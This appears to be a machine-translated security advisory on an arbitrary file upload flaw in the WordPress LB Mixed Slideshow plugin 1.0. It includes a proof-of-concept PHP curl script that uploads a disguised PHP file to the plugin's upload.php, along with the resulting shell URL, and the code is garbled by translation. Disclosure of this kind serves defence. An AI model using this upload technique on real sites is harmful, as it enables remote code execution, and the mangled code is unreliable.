Release date:
Updated on:
Affected Systems:
WordPress LB Mixed Slideshow Plugin 1.x
Description:
--------------------------------------------------------------------------------
WordPress is a Blog (Blog, Blog) engine developed using the PHP language and MySQL database. you can create your own Blog on servers that support PHP and MySQL databases.
LB Mixed Slideshow plugin for WordPress 1.0 has a security vulnerability. wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload. the php script does not correctly verify the uploaded files and can be maliciously used to execute PHP code.
<* Source: Sammy Forgit
Link: http://secunia.com/advisories/49610/
Http://www.opensyscom.fr/Actualites/wordpress-plugins-lb-mixed-slideshow-arbitrary-file-upload-vulnerability.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Sammy Forgit () provides the following test methods:
PostShell. php
<? Php
$ Uploadfile = "lo.php.gif ";
$ Ch = curl_init ("http://www.exemple.com/wordpress/wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php? Element_name = images & gid = 1 ");
Curl_setopt ($ ch, CURLOPT_POST, true );
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('images' => "@ $ uploadfile "));
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
$ PostResult = curl_exec ($ ch );
Curl_close ($ ch );
Print "$ postResult ";
?>
Shell Access: http://www.exemple.com/wordpress/wp-content/plugins/lb-mixed-slideshow/gallery/1/lo.php.gif
Lo.php.gif
<? Php
Phpinfo ();
?>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://wordpress.org/